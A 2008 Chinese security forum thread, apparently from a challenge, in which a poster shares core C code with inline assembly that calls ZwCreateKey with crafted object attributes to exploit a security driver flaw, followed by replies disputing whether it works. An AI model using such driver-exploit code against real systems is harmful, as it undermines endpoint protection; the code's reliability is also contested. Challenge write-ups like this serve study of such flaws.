首页
社区
课程
招聘
[分享]第三题的解法
发表于: 2008-12-23 08:26 22952

[分享]第三题的解法

2008-12-23 08:26
22952
利用驱动的漏洞:
核心代码:
HKEY hkey=(HKEY)"360game";
   WCHAR xx[] = L"xxxx_fuck";

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");

__asm{
  
   push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p
   
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 221
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
2
看你的代码好像是不行的
2008-12-23 08:48
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我在虚拟机上试过了的,呵呵
2008-12-23 09:00
0
雪    币: 152
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
这个就是所谓的歪解了
2008-12-23 10:29
0
雪    币: 635
活跃值: (101)
能力值: ( LV12,RANK:420 )
在线值:
发帖
回帖
粉丝
5
什么歪解,搞笑吧 ****
这个代码根本都跑不了的,ZwCreateKey根本执行不了~
2008-12-23 14:03
0
游客
登录 | 注册 方可回帖
返回
//